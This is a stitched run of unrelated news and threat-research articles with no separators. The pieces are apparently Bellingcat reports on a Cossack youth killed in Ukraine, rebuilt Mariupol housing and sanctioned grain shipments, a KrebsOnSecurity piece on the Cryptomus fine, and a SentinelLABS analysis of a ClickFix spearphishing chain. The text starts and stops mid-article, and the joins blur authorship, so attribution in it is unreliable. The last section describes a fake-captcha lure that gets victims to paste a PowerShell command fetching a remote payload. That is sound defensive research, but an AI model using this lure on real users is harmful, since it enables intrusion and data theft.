Andreevich also led Oleg to two military-inspired events in April 2024.
Five days later they went to a training that
included trench tactics and simulated helicopter jumps.
Since
2023,
Oleg often wore a distinctive yellow and red
“Скорпион”
call sign patch on his chest when wearing military fatigues, which distinguishes him from other
youth at the events. That and other distinctive features identify him even with a mask or
goggles.
Bellingcat was able to geolocate this place to be a
Rosgvardia
training ground
on the outskirts of Saratov.
Notably, the trenches are not visible on Google Earth but are on Yandex Maps, which has more recent imagery for
the region.
As is
Oleg Mysov, another returned fighter who also
engages in “patriotic education of youth”
events.
Both have
attended Cossack events.
Even though in this photo they are holding the Volga Cossack Host flag, Bellingcat could not
clearly identify them as Cossacks.
Bellingcat geolocated it to a military training ground in Samara, the same location where
other
Cossack recruits
trained before deploying to BARS-15. Fetisov himself
shared photos
of this training ground
two weeks after stepping down
as Ataman to join BARS-15. Andreevich left and Oleg right in
this
photo.
They used real weapons this time. A
video montage
shows participants firing live rounds.
This is
a
photo
that includes Oleg, Fetisov, and Andreevich. The first media we found for this event
is from early September
which is consistent with the
sun position
in this photo and the grass patches seen in satellite imagery from early September 2024.
Bellingcat contacted Kuznetsov, Fetisov and Andreevich to ask about their roles in the Cossack
community, but they haven’t responded.
This is the last time Bellingcat was able to trace Oleg’s whereabouts with open sources before
he joined BARS-15.
VOLUNTARY RECRUITMENT
Many countries have a volunteer reserve system for getting more soldiers in times of war. In
Russia, the system is known as
BARS,
created in 2015
and
intensified
in
2021.
All BARS fighters sign a contract with the Ministry of Defense and get paid.
Mapping the geolocated positions of these units in the
UAControlMaps Project dataset
reveal widespread areas of operations. BARS Battalions are often reorganised.
Estimates
put the total number so far at
over 30 BARS Battalions and 10 of them
have overt Cossack affiliation.
Cossacks also
operate
as detachments in other military structures.
By
their own reckoning,
in February there were more than 18,500 Cossacks on the front lines in Ukraine. In May the
first-ever national Ataman, Nikolai Doluda, gave a higher figure of 46,000
Cossacks.
As of 2024, British Professor Rod Thornton estimated
that BARS constitute some 10-30,000 troops in Ukraine, 15% of the total invasion force.
The
Mediazona project
tracks individual Russian losses in Ukraine and publishes bi-weekly reports. As of Nov. 21, 2025,
they identified 149,241 publicly named casualties,
Oleg
among them.
The project also tracks volunteer casualties.
Deaths of volunteer fighters constituted 12.8% of losses in 2022 and 21.9% 2023. In 2024 they more
than doubled to 45.7%. As of Nov. 21, verified
deaths of volunteer fighters for 2025 were at 42.8%.
BARS-15
BARS-15 is a Cossack battalion created on
May 15, 2022,
and named
Ермакafter
a
historical
Ataman.
Originally composed of Cossacks from multiple hosts, mainly Volga and Oremburg, it
now
draws its members from the Volga Host only.
Credit: All-Russian Cossack Society
The panel reads Black Hussars. Oleg is on his knee in front of Andreevich, wearing his distinctive
“Scorpion” patch.
Credit: VKontakte @svpo_berkut
The number of active Cossack fighters in BARS-15 is reportedly 400, a number echoed
by a former Commander, with other sources saying over 900 volunteers
have passed through as of September 2024. They reportedly
took part in the
invasion
of Avdiivka among other combat
activities in Ukrainian cities both in Donetsk and Luhansk.
Credit: VKontakte @vvko_russia
One of its former members is Andrey Fetisov, who temporarily stepped down as Saratov District Ataman and joined
BARS-15 between approximately November
2023 and June 2024.
Credit: Telegram @izvestia64
In April 2024, Fetisov received a Medal for Bravery from
Vitaly Kuznetsov, the national Ataman. Within six months, Fetisov would be taking Oleg to the
BARS-15 training camp.
Credit: Telegram @izvestia64
There are many reasons why people are motivated to join Cossack groups, Dr Fantoni told Bellingcat,
adding that these motivated individuals “are the driving force” behind militarisation. “Some do it
out of patriotic motivations, others for political, economic or individual status gain, some even
because this can protect oneself from future mobilisation to an actual fighting unit,” he said.
This image first appeared on Oleg’s obituary
posted
by Fetisov. The vehicle, road, and equipment are consistent with those used by other fighters with
the
Black Hussars
around February 2025.
According to
recruitmentposts
BARS-15 training takes three weeks. A
recent
study
found that to be the norm in Russia’s military while also labelling training as “low-quality and
ineffective”.
Bellingcat reached out to Oleg’s parents.
His mother said she couldn’t speak about Oleg’s death,
it still hurts too much.
Additional research by Timothy B, Afton Briones, Sarah Grossman, Alexandra Malikova, Mitchell Polman, Olivia
Gresham, Bonny Albo, Adam Arthur, Robert Chapman of the Bellingcat Volunteer
Community.
Youri van der Weide and Aiganysh Aidarbekova contributed to this report.
Bellingcat is a non-profit and the ability to carry out our work is dependent on the kind support of
individual donors. If you would like to support our work, you can do so here.
You can also subscribe to our Patreon channel here.
Subscribe to our Newsletter
and follow us on Bluesky here and Mastodon here. With the
unpredictability of social media algorithms making it harder for news outlets to reach audiences
consistently, we have also started a WhatsApp channel that you can join to stay updated on our
stories.
Satellite images are courtesy of Yandex, Maxar, Airbus, MapBox and Google Earth.
Co-funded by the European Union. Views and opinions expressed are those of the author(s) only and do not
necessarily reflect those of the European Union or the European Health and Digital Executive Agency
(HADEA). Neither the European Union nor the granting authority can be held responsible for them.
It’s the second time Moreva has lost her home. She fled to Mariupol from Makiivka, an industrial
city near Donetsk, after Russia occupied Donbas in 2014. The 57-year-old rebuilt her life in the
port city, working as a professor in Mariupol State University’s ecology department and running an
animal shelter in her spare time.
When Russia launched its full-scale invasion of Ukraine, her husband was in Donetsk and their adult
daughter was living near the town of Bucha, where unarmed civilians were massacred.
“I was preparing lectures and my daughter called me early in the morning and said: ‘Mum, we are
being bombed.’ I said: ‘Vika, are you kidding? What do you mean you are being bombed?’ At that
moment it was still quiet in Mariupol.”
Soon after, the phone lines went down and Moreva lost all contact with her family.
Viktoriia Moreva at the Sea of Azov, Mariupol
On the day the airstrikes began in Mariupol, Moreva said she ran into the street with her neighbours
to wave at a drone overhead. “We thought that, seeing civilians, they would not bomb the area,” she
said. “But within a few minutes, the whole district was completely destroyed.”
Moreva described the harrowing early days of the siege of Mariupol: water, gas and electricity
supplies severed; Russian tanks roaming the city; bodies in the streets; children shot in fleeing
cars; screams from under the rubble.
“All the authorities had left, abandoned the city. It was mostly civilians who remained, including
many children, because there was no evacuation and no green corridors. We had nothing – no rescue
services, no ambulances, no fire department, absolutely nothing.”
Viktoriia Moreva’s apartment building after it was bombed
Moreva said at least seven of her neighbours were killed when her apartment block was repeatedly
bombed. The ones who survived cannot go home because the building has since been demolished. Of
those who remain in the occupied city, she knows of only one, an old man, who was rehoused. She said
his case was reported as a “success story” on pro-Russian social media channels.
Across the city, Moreva said the bodies of many people who died in their homes have never been
found. “People were trapped under the rubble when the buildings collapsed,” she said. “They
suffocated or died from cold, hunger and illness because they couldn’t get out, and no one could
reach them. Many were literally buried alive.”
Often, she said, the bodies that were recovered were buried in the courtyards of the apartment
buildings. “People covered the bodies with soil, and when the ground was frozen, they could only
cover them lightly, wrapping them in carpets or blankets.
“In Mariupol, now, they are building houses on bones. They are building so that people cannot
return.”
Viktoriia Moreva with her husband Alexander at Glenveagh National Park in Ireland
Moreva, who was eventually reunited with her family, now lives in Ireland. She still has the keys to
her apartment, “to the door that’s no longer there”. If she ever returns to Ukraine, it will not be
to the adopted city that she loved. “Even if I dreamed of getting there, I cannot enter,” Moreva
said. “I have nothing left in Mariupol.”
Warning: This report contains graphic imagery.
A new apartment in the Mirapolis complex comes with panoramic views of the city. The property
developer boasts easy access to shops and schools, with colourful mock-ups showing families and
manicured gardens. “If you’ve been thinking about owning your own apartment by the sea,” it says,
“now is the best opportunity to realise your dream.” Prices range from about €75,000 to €110,000.
The Mirapolis estate is just one of many “new” residential housing complexes under construction
across Mariupol, the Ukrainian port city subjected to some of the worst horrors of Russia’s
invasion.
When the apartment blocks that originally stood here were bombed in March 2022, the residents of
Building 127 sheltered in the basement. Children were among the 90 people killed in the attack,
according to Mariupol’s Destruction and Victims
Map, which has documented the devastation across the city. At a nearby burial ground, graves
were marked with crosses made from scrap wood.
Credit: REUTERS
The four high-rises on the western edge of Mariupol were destroyed, and then torn down. Now, they
are being rebuilt.
Credit: REUTERS
Across the road is the new Nevsky residential estate, one of the sites pro-Kremlin media has used to
paint a picture of life returning to normal in Mariupol, which has been under Russian occupation for
more than three years. In a video of Russian president Vladimir Putin meeting residents in the
neighbourhood in 2023, a woman in the background can be heard shouting “This is all a lie!”
The damaged buildings were leveled by 2024.
Credit: Google Earth / Maxar, Google Earth / Airbus
A Bellingcat investigation has identified 23 multi-storey housing complexes — more than 50
buildings with at least 6,000 apartments – being built in the ashes of Mariupol and advertised
for sale, with low interest rate loans, to Russian citizens. Construction of the first buildings
has been completed; new residents have already moved in. Meanwhile, many of the original
Ukrainian owners cannot return home.
Satellite imagery shows the buildings before Russia invaded Ukraine in 2022. By the
summer of 2024, all had been demolished, with some already being rebuilt.
Russia launched its full-scale invasion of Ukraine on Feb. 24, 2022, minutes after
Vladimir Putin announced the start of a “special military operation” on state television.
Credit: Al Jazeera
The strategically important southeastern city of Mariupol was surrounded within days. Homes and
infrastructure were shelled.
Credit: Associated Press
The Russian bombardment cut food, water, power and heat to the besieged city. Internet and phone
lines went down.
Credit: REUTERS/Alexander Ermochenko
Most of Mariupol’s 430,000 residents were forced to flee.
Credit: REUTERS/Alexander Ermochenko
By the time the brutal 86-day siege ended, an estimated 25,000 people had been killed,
including thousands who died when their homes were bombed. Many are buried in mass
graves. The United Nations said
90 percent of Mariupol’s residential buildings were damaged or destroyed.
As part of its post-siege reconstruction of the coastal city, Russia deployed workers to
demolish what was left.
And to rebuild. In the months after Mariupol was razed, the new authorities released a
plan
to “restore” the city and grow its population to 500,000 over the next decade.
It is part of the Russification of Mariupol: streets have been renamed, Ukrainian monuments
removed, and murals painted over. Access to Ukrainian websites has been blocked and Russian
programmes are shown on television. Mariupol and St Petersburg are now “twin cities”.
Russia is painting a picture of a city restored, but many locals still live in perilous
conditions, including some in half-destroyed buildings.
Credit: REUTERS/Sergei Ilnitsky
“A Step into a Bright Future”
The largest of the 23 developments is the Leningrad Quarter, a 10-minute drive from the shore of the
Sea of Azov. The sprawling residential complex, in Mariupol’s north-east, includes at least 11
high-rises along with car parking, recreation areas and children’s playgrounds. Last week, another
phase of the project was released, with four new apartment blocks listed online. “We are building
the future of Russia!” the website for the development says. The apartments are listed for sale with
“preferential
mortgages” at a 2 percent interest rate over 30 years with Russian banks. Mortgage rates in
Russia are, on average, about 20 percent.
Rewind three years. The Leningrad Quarter was a site of death and destruction. People fell from
their windows when the original building at 81 Metallurgist Avenue was shelled and engulfed in
flames, according to posts in a Telegram channel that documented the lives lost here. A
great-grandmother was killed when her apartment in Building 77 burned, her family said. Another
woman died while hiding in the basement of Building 121. “Forgive me, mum, for not saving you,” her
daughter wrote. Near Building 83, someone posted a photo of a 36-year-old woman’s grave, with fresh
flowers and a makeshift plaque. “I don’t know how she died,” they said.
Credit: TASS
Residents who survived the siege of Mariupol, or have since returned to the captured city, face the
challenge of finding somewhere to live. How can they prove ownership when property records are
missing or have been destroyed? To claim their home in the occupied territory – to prevent an “ownerless” property from
being confiscated – they must become Russian citizens and present, in person, with ownership
documents.
Credit: Mariupol’s Destruction and Victims Map
Some residents – including the people who lived in the original Soviet-era buildings at the
Leningrad site – have posted videos to social media, cautiously appealing to Putin and the
Russian-installed authorities in Mariupol to intervene.
“We don’t have the possibility to buy the housing with [a] mortgage, as many of us are
pensioners or have lost practically everything,” one woman said. Another said: “In 2022 we
lost housing, property, and many of us also our loved ones.”
Residents complain about being unable to move back to the sites where they used to live, and
say they were misled about access to compensatory housing. They say many people across the
city are still homeless or forced to rent.
Those who can prove property ownership say the financial compensation being offered is at a
rate far lower than market value. Authorities have said they will compensate residents who
lost their homes in the war, but this is capped at about €12,000 for
a one-person household and €16,000 for a two-person family. The cheapest flats advertised in
the rebuilt apartment blocks start at about €45,000 for a 20m2 studio.
“We are not asking for favours, but for adherence to the law and promises made,” one woman
said. “We ask to be given the housing we were promised, not an offer of [a] mortgage to our
own house or someone’s ‘ownerless’ apartment.”
It’s not only people from the reconstructed high-rises advertised for sale who are impacted. In one
video, a woman can be heard sobbing as she films the hollowed-out shell of a building on the western
edge of Mariupol. This apartment block was demolished but has not been rebuilt.
For Viktoriia Moreva, who lived on the first floor of the building, there’s nothing to go back to.
Moreva was in a friend’s home nearby when airstrikes hit her home in March 2022. She watched it
burn.
Viktoriia Moreva in Ireland
“We just couldn’t understand it, why the shelling started with the houses,” she
said. “It was a quiet residential area. There was a school and two kindergartens in
this area. No soldiers were in the houses. Only civilians.”
“Flagrant Violations of International
Law”
Professor Balakrishnan Rajagopal, the UN’s Special Rapporteur on the right to adequate housing, said
Russia’s attacks on homes and residential areas in Mariupol were “grave war crimes and crimes
against humanity”.
He told Bellingcat that the scale and intensity of destruction, mass displacement of residents and
deaths of civilians constituted “one of the most flagrant violations of international law” and were
“comparable to some of the worst examples from World War II”.
“Mass destruction of homes during conflict as in Mariupol are acts of ‘domicide’, as I proposed to the UN General Assembly
in 2022, and may constitute war crimes, crimes against humanity or even genocide, depending on
facts,” he said.
Professor Rajagopal said the housing policy measures implemented by Russia were contrary to the
basic rules of international law, such as the prohibition against taking private property during
occupation under the laws of war, including the Hague regulations.
“What appears to be happening is in fact an annexation of Ukrainian territory, through occupation
and creation of new property rights which excludes the former owners,” he said. “Declaring a
property ‘ownerless’ or ‘abandoned’ in order to annex it is an old colonial legal trick that settler
colonial states have used for hundreds of years when such property, usually belonging to native
populations, was declared ‘terra nullius’ (no person’s land) in order to acquire it, but is
considered to be completely contrary to modern international law.”
“What Russia is attempting is to go back to medieval practices and discredited norms such as ‘terra
nullius’ that Russia itself, as part of the Soviet Union, actively opposed for decades.”
A 2023 analysis by the Kyiv School of Economics estimated the damage to Ukraine’s housing stock to
be almost $56 billion. Mariupol was one of the worst-affected cities: Ukrainian authorities said
more than 11,000 homes were destroyed and tens of thousands more were damaged. Half of the 2,600
multi-storey residential buildings were reduced to rubble.
Credit: REUTERS
Over a large block that was decimated in central Mariupol, seven separate residential complexes are
nearing completion. Among them are four gemstone-named developments ranging from nine to 15 storeys.
Three apartment blocks in the centre of the “resort town” – the Residence I, Residence II, and
Residence III – are due to be completed by the end of the year.
Like the other estates analysed by Bellingcat, these apartments are listed on Russian real estate
websites with low-interest loans.
The advertisements target families with children: “Everything is close by: the sea, a park, schools,
medical facilities and a church,” says one for the new Residence III. They don’t show what was here
before.
The tree-lined street where Residence III now stands became a graveyard during the siege.
Credit: REUTERS / Alexander Ermochenko
A short walk away is Hospital No. 3, the children’s and maternity hospital bombed by Russian forces
on March 9, 2022. “Everything was destroyed in one second,” said Elena Karas, a nurse who was caring
for 13 premature babies on the third floor. “I didn’t ever think they could bomb our hospital. Not a
hospital. You would think it’s a safe place,” she
toldThe New York Times.
Ukrainian authorities said three people were killed and more than a dozen others were injured in the
attack, which President Volodymyr Zelensky said was evidence of genocide.
Iryna Kalinina, the wounded pregnant woman in this photograph, and her unborn baby – named Miron,
meaning “peace” – both died.
Credit: Associated Press / Evgeniy Maloletka
Across the road from the hospital, construction workers are building the Horizon complex, two
“comfort class” high-rises due to be finished by 2026.
A block behind the site is the Cypress complex. The residential building that originally stood here
was bombed and later torn down. Advertisements for Cypress – “a new destination for those who value
prestige, comfort, and reliability” – tout the 15-storey building’s proximity to Hospital No. 3.
On March 16, 2022, a Russian airstrike hit
Mariupol’s drama theatre.
The grand Soviet-era building had become the city’s main bomb shelter, with hundreds of civilians
seeking refuge inside. Outside, the word “CHILDREN” had been spelled out on the ground in giant
Cyrillic letters. As many as 600 people reportedly
died in the attack.
Credit: Google Earth / Airbus
Less than 500m from the theatre is the original site of the House with the Clock, a historic
landmark in the city’s centre. Noted for its clock tower, the 1950’s building served as a meeting
place for the city’s residents.
In the months before Russia’s invasion, its facade had been restored and a new clock installed.
Credit: House with the Clock / Google Maps
The building was shelled during the siege and demolished after Mariupol fell.
Credit: Mariupol’s Destruction and Victims Map
A new multi-storey complex with studio, one- and two-bedroom apartments was built on the site in
late 2024. “The House with the Clock was a recognisable symbol of Mariupol, but was damaged during
the war,” the property developer’s website says.
As is the case with most new complexes analysed by Bellingcat, its original address was changed
under occupation – a tactic Mariupol’s residents say further complicates their claim to housing. The
House with the Clock was on Myru Avenue – “Avenue of Peace”. The road has since been renamed Lenin
Avenue, after the former Soviet leader.
Farther east is the Azovstal Iron and Steel Works plant, where Mariupol’s last defenders surrendered on May 20, 2022.
Credit: Cover Media via REUTERS
Beyond the Azovstal steelworks are four new residential developments: the Olympic, Left Bank,
Zhukova and Designer’s House Mari, a seven-storey “business-class” complex “inspired by the sandy
coast”.
The bombed-out building seen in this footage is where Designer’s House Mari is being built.
Credit: Defense of Ukraine
Polished advertisements for the new building show it will feature landscaped courtyards and a
24-hour concierge service. Prices for a two-bedroom apartment are listed for about €130,000.
Ukrainian journalist Mstyslav Chernov and his Associated Press colleagues were trapped in Mariupol
during the first weeks of the siege.
The last international journalists to remain in the city, they captured
some of the most defining – and haunting – images of the war.
The crew reported from across the charred city, including in Mariupol’s north-west, near the new
655-apartment Mirapolis complex. In this area, four new complexes are also under construction.
“This is where your story begins,” a website for the Azure Coasts development says. Among the people
killed here in March 2022 was an elderly man. “He lies there under the rubble,” his granddaughter
posted on Telegram.
An apartment building on Kuprina Street promises its new residents “comfort, security and
affordability”. A video filmed nearby after the original buildings were bombed shows unburied bodies
on the grass, carefully wrapped in sheets.
Credit: Mariupol’s Destruction and Victims Map
Maple Alley, a complex with 10 apartment blocks, is featured in a Russian YouTube video with the
caption: “Dreaming of an apartment by the sea with a preferential mortgage?” It is being built where
a mother and her son were buried with their neighbours during the siege.
Credit: Mariupol’s Destruction and Victims Map
This high-rise, advertised as having children’s playgrounds and being close to a kindergarten, is on
Troyiczka Street, which has been renamed to commemorate the USSR.
Credit: Mariupol’s Destruction and Victims Map
The UN’s Office of the High Commissioner for Human Rights (OHCHR) has said
that Russia’s legislation on “abandoned property” in occupied Ukraine violates international humanitarian
law prohibiting the unlawful confiscation of property, affecting both the right of displaced people to
return to their homes and the right to adequate housing.
The Institute for the Study of War (ISW) said Russia was engaged in a “large-scale campaign” to inventory
real estate in occupied parts of Ukraine, including Mariupol, with the intention of nationalising and
seizing property. Karolina Hird, a national security fellow at ISW, said the campaign has two main aims: to
generate profit for the Russian state and to repopulate occupied areas with Russian citizens and residents
loyal to the regime.
Hird said Russia’s bill to standardise and codify the mass nationalisation of “ownerless” property in
occupied Ukraine contains a provision for allocating nationalised residential real estate to government
officials, military and law enforcement personnel, doctors and teachers. The properties are often offered to
Russians at premium rates, she said, as a financial incentive to attract relocation to occupied regions.
“The property nationalisation campaign therefore supports the Russian effort to lend legitimacy to its
illegal occupation by creating the impression that occupied areas are predominantly populated by Russian
citizens. The fact that Ukrainians who wish to reclaim their property from Russian nationalisation schemes
must have Russian documentation further supports this campaign.”
As of Aug. 2025, Russia’s real estate registration agency Rosreestr reported that it had registered 550,000
properties in occupied Ukraine as “ownerless”.
Hird said the impact on the original owners and residents of seized property can be severe. “Russia uses its
ownership of the seized property as a coercive bargaining tool, basically trying to force residents to
return to occupied areas and receive Russian documentation and face the horrors and challenges of living
under occupation if they wish to retain their property,” she said.
“Property seizure also represents a loss of control for the original residents, who have no mechanism with
which to dispute its allocation to Russian citizens or regime loyalists. Russia’s longer-term aim is to make
the reintegration of occupied territories seem infeasible to Ukrainians, and the seizure of homes and
apartments significantly complicates the concept of future reintegration.”
Ilvija Bruge, Beau Donelly and Miguel Ramalho contributed to this article.
Bellingcat is a non-profit and the ability to carry out our work is dependent on the kind support of
individual donors. If you would like to support our work, you can do so here. You can also subscribe to our
Patreon channel here. Subscribe to our Newsletter
and follow us on Bluesky here and Mastodon here. With the
unpredictability of social media algorithms making it harder for news outlets to reach audiences
consistently, we have also started a WhatsApp channel that you can join to stay updated on our
stories.
Image Credits: Reuters, Associated Press, Al Jazeera, EFE, Mariupol’s Destruction and Victims Map, First
Corps Azov of the National Guard of Ukraine, Mariupol Now, House with the Clock / Google Maps, TASS,
Satellite images are courtesy of Planet Labs, Maxar, Airbus and Google Earth, and tiles are hosted by
Mapbox.
Co-funded by the European Union. Views and opinions expressed are those of the author(s) only and do not
necessarily reflect those of the European Union or the European Health and Digital Executive Agency
(HADEA). Neither the European Union nor the granting authority can be held responsible for them.
Financial regulators in Canada this week levied $176 million in fines against Cryptomus, a digital payments platform that supports dozens of Russian cryptocurrency exchanges and websites hawking cybercrime services. The penalties for violating Canada’s anti money-laundering laws come ten months after KrebsOnSecurity noted that Cryptomus’s Vancouver street address was home to dozens of foreign currency dealers, money transfer businesses, and cryptocurrency exchanges — none of which were physically located there.
On October 16, the Financial Transactions and Reports Analysis Center of Canada (FINTRAC) imposed a $176,960,190 penalty on Xeltox Enterprises Ltd., more commonly known as the cryptocurrency payments platform Cryptomus.
FINTRAC found that Cryptomus failed to submit suspicious transaction reports in cases where there were reasonable grounds to suspect that they were related to the laundering of proceeds connected to trafficking in child sexual abuse material, fraud, ransomware payments and sanctions evasion.
“Given that numerous violations in this case were connected to trafficking in child sexual abuse material, fraud, ransomware payments and sanctions evasion, FINTRAC was compelled to take this unprecedented enforcement action,” said Sarah Paquet, director and CEO at the regulatory agency.
In December 2024, KrebsOnSecurity covered research by blockchain analyst and investigator Richard Sanders, who’d spent several months signing up for various cybercrime services, and then tracking where their customer funds go from there. The 122 services targeted in Sanders’s research all used Cryptomus, and included some of the more prominent businesses advertising on the cybercrime forums, such as:
-abuse-friendly or “bulletproof” hosting providers like anonvm[.]wtf, and PQHosting;
-sites selling aged email, financial, or social media accounts, such as verif[.]work and kopeechka[.]store;
-anonymity or “proxy” providers like crazyrdp[.]com and rdp[.]monster;
-anonymous SMS services, including anonsim[.]net and smsboss[.]pro.
Flymoney, one of dozens of cryptocurrency exchanges apparently nested at Cryptomus. The image from this website has been machine translated from Russian.
Sanders found at least 56 cryptocurrency exchanges were using Cryptomus to process transactions, including financial entities with names like casher[.]su, grumbot[.]com, flymoney[.]biz, obama[.]ru and swop[.]is.
“These platforms were built for Russian speakers, and they each advertised the ability to anonymously swap one form of cryptocurrency for another,” the December 2024 story noted. “They also allowed the exchange of cryptocurrency for cash in accounts at some of Russia’s largest banks — nearly all of which are currently sanctioned by the United States and other western nations.”
Reached for comment on FINTRAC’s action, Sanders told KrebsOnSecurity he was surprised it took them so long.
“I have no idea why they don’t just sanction them or prosecute them,” Sanders said. “I’m not let down with the fine amount but it’s also just going to be the cost of doing business to them.”
The $173 million fine is a significant sum for FINTRAC, which imposed 23 such penalties last year totaling less than $26 million. But Sanders says FINTRAC still has much work to do in pursuing other shadowy money service businesses (MSBs) that are registered in Canada but are likely money laundering fronts for entities based in Russia and Iran.
In an investigation published in July 2024, CTV National News and the Investigative Journalism Foundation (IJF)documented dozens of cases across Canada where multiple MSBs are incorporated at the same address, often without the knowledge or consent of the location’s actual occupant.
Their inquiry found that the street address for Cryptomus parent Xeltox Enterprises was listed as the home of at least 76 foreign currency dealers, eight MSBs, and six cryptocurrency exchanges. At that address is a three-story building that used to be a bank and now houses a massage therapy clinic and a co-working space. But the news outlets found none of the MSBs or currency dealers were paying for services at that co-working space.
The reporters also found another collection of 97 MSBs clustered at an address for a commercial office suite in Ontario, even though there was no evidence any of these companies had ever arranged for any business services at that address.
An investigation by Bellingcat has identified yet another Russian-flagged bulk carrier, Irtysh (IMO: 9664976), operating in defiance of Western sanctions by exporting grain from occupied Crimea to Houthi-controlled Yemen.
Following the same pattern of deceptive methods used by other vessels involved in what Ukraine describes as “grain theft,” Irtysh disabled its location tracking en route to and from the Port of Sevastopol. The vessel also made a mandatory stop in Djibouti for inspection by the United Nations Verification and Inspection Mechanism (UNVIM) for Yemen before sailing on to the Port of Saleef, Yemen.
The majority of UN member states have repeatedly voted against Russia’s invasion of Ukraine. UNVIM told Bellingcat: “As a UN mandated body UNVIM does not have the authority to block shipments based on unilateral national or regional sanctions.” They added: “The UNVIM mandate is limited to verifying compliance with the UN Security Council resolutions related to Yemen.”
However, experts have previously highlighted to Bellingcat that even with the limitations of that remit the fact that grain shipments from occupied Ukrainian territories are passing through UN inspection mechanism creates an awkward situation.
Bellingcat mapped Irtysh’s journey by combining Automated Identification System (AIS) data from Lloyd’s List Intelligence and satellite analysis. During the investigation, two additional vessels were also identified with their tracking systems disabled while loading grain in Sevastopol: Matros Pozynich (IMO: 9573816) and Zafar (IMO: 9720263).
All cargo vessels must be inspected in Djibouti before proceeding to Houthi-controlled ports. AIS data showed Irtysh anchored off Djibouti for six days.
Two days later, Matros Pozynich switched its AIS back on before sailing through the Bosphorus Strait, just as Irtysh had. With its hull sitting low in the water, the vessel was photographed passing through Turkish waters seemingly fully laden.
After calling at Djibouti, likely for inspection by UNVIM, AIS data shows the bulk carrier departing for Saleef, Yemen, on Oct. 8. At time of publication, Matros Pozynich remains in anchorage off the Port of Saleef, Yemen.
A third vessel, also previously implicated for smuggling grain, Zafar, was captured by satellite imagery with its AIS turned off at the Port of Sevastopol from Sept. 23.
At the time of publication, Zafar had not sailed to Yemen via Djibouti. Instead, it was anchored off the Port of Alexandria, Egypt – another known location for offloading grain from occupied Ukraine, according to OCCRP reporting.
“Grain Theft”
Ukraine has repeatedly tried to dissuade countries from purchasing shipments loaded with what it describes as stolen grain from occupied regions.
The Port of Sevastopol and the Avlita grain terminal remain under European,UK and US sanctions. While no UN sanctions specifically target the port, a majority of UN member states have passed resolutions condemning Russia’s invasion of Ukraine and of its occupation of Crimea since 2024.
Support Bellingcat
Your donations directly contribute to our ability to publish groundbreaking investigations and uncover wrongdoing around the world.
Both Irtysh and Matros Pozynich delivered grain to the Houti-controlled Port of Saleef via Djibouti – the UNVIM inspection point for Yemen. After ten years of war, the UNHCR reports that tens of thousands of people in Yemen are living in famine-like conditions, with a further five million people experiencing food insecurity.
UNVIM confirmed to Bellingcat that the Irtysh was inspected “in line with UNVIM operational protocols” on Sept. 7 and cleared by the Saudi-led coalition Evacuation and Humanitarian Operations Cell (EHOC) – a body entirely separate from the UN – on Sept. 8.
Asked whether UNVIM was aware the vessel had picked up grain from a port under Western sanctions, the agency replied: “The UNVIM mandate is limited to verifying compliance with the UN Security Council resolutions related to Yemen. Unilateral national sanctions or measures beyond that scope are outside the UNVIM mandate.”
Neither the Russian government nor its foreign ministry responded to requests for comment.
Yörük Işık, Bridget Diakun, Peter Barth, Galen Reich, Claire Press and Merel Zoetcontributed to this report.
Bellingcat is a non-profit and the ability to carry out our work is dependent on the kind support of individual donors. If you would like to support our work, you can do so here. You can also subscribe to our Patreon channel here. Subscribe to our Newsletter and follow us on Twitter here and Mastodon here.
SentinelLABS together with Digital Security Lab of Ukraine has uncovered a coordinated spearphishing campaign targeting individual members of the International Red Cross, Norwegian Refugee Council, UNICEF, and other NGOs involved in war relief efforts and Ukrainian regional government administration.
Threat actors used emails impersonating the Ukrainian President’s Office carrying weaponized PDFs, luring victims into executing malware via a ‘ClickFix’-style fake Cloudflare captcha page.
The final payload is a WebSocket RAT hosted on Russian-owned infrastructure that enables arbitrary remote command execution, data exfiltration, and potential deployment of additional malware.
Despite six months of preparation, the attackers’ infrastructure was only active for a single day, indicating sophisticated planning and strong commitment to operational security.
An additional infrastructure pivot revealed a mobile attack vector with fake applications aimed at collecting geolocation, contacts, media files and other data from compromised Android devices.
Background
Following intelligence shared by research partner Digital Security Lab of Ukraine, SentinelLABS conducted an investigation into a coordinated spearphishing campaign launched on October 8th, 2025, targeting organizations critical to Ukraine’s war relief efforts.
The campaign was initiated through emails that impersonated the Ukrainian President’s Office and contained a weaponized PDF attachment (SHA-256: e8d0943042e34a37ae8d79aeb4f9a2fa07b4a37955af2b0cc0e232b79c2e72f3) embedded with a malicious link.
PDF document page 1/8
Targeted organizations included the International Committee of the Red Cross (ICRC), United Nations Children’s Fund (UNICEF) Ukraine office, Norwegian Refugee Council, Council of Europe’s Register of Damage for Ukraine, and Ukrainian government administrations in the Donetsk, Dnipropetrovsk, Poltava, and Mikolaevsk regions.
The weaponized PDF was an 8-page document that appeared to be a legitimate governmental communique. VirusTotal submissions on October 8th showed the malicious file uploaded from multiple locations including Ukraine, India, Italy, and Slovakia, suggesting widespread targeting and potential victim interaction with the campaign.
PhantomCaptcha Attack Chain
The PhantomCaptcha campaign employed a sophisticated multi-stage attack chain designed to exploit user trust and bypass traditional security controls.
Opening the weaponized PDF and clicking on the embedded link directed the victim to zoomconference[.]app, a domain masquerading as a legitimate Zoom site but in reality hosting a VPS server located in Finland and owned by Russian provider KVMKA.
Our analysis showed that zoomconference[.]app, hosted on IP 193.233.23[.]81, stopped resolving on the same day the attack attempt took place, indicating a single day operation. However, we were able to retrieve the server response from a record captured on VirusTotal. The server response showed that any visitors to the site encountered a convincing fake Cloudflare DDoS protection gateway.
Initial view of a page from zoomconference[.]app
After loading, the fake Cloudflare page attempts to establish a WebSocket connection to the attackers’ server, passing a randomly generated client identifier, clientId, produced by an embedded JavaScript function generateRandomId(). A JavaScript comment before the function suggests the client identifier should be 32 characters long; however, the code utilizes only 2 characters for clientId.
The attack infrastructure supported two potential infection paths. If the WebSocket server responded with a matching identifier, the victim’s browser would redirect to a legitimate, password-protected Zoom meeting. This infection path likely enabled live social engineering calls with victims; however, activation of this path was not observed during our investigation.
The primary infection vector relied on a variation of a social engineering technique that has been widely deployed by a variety of threat actors since mid-2024. Dubbed ClickFix or Paste and Run, it involves convincing the target to execute commands either deliberately or surreptitiously copied to the user’s clipboard. The PhantomCaptcha variant of this technique works as follows.
After the fake “automatic” verification process, victims are presented with a simulated reCaptcha challenge displaying an “I’m not a robot” checkbox.
Simulated reCaptcha controls
Clicking the checkbox triggers a popup with instructions in Ukrainian, directing users to
Click the “Copy token” button in the popup
Press Windows + R to open the Run dialog
Paste and execute the command
Custom reCaptcha popup in Ukrainian with “Copy token” button
The button runs a function copyToken() which contains a PowerShell commandlet designed to run invisibly.
The code downloads and executes the next stage PowerShell script from hxxps://zoomconference[.]app/cptch/${clientId}, where ${clientId} is the same ID as described above.
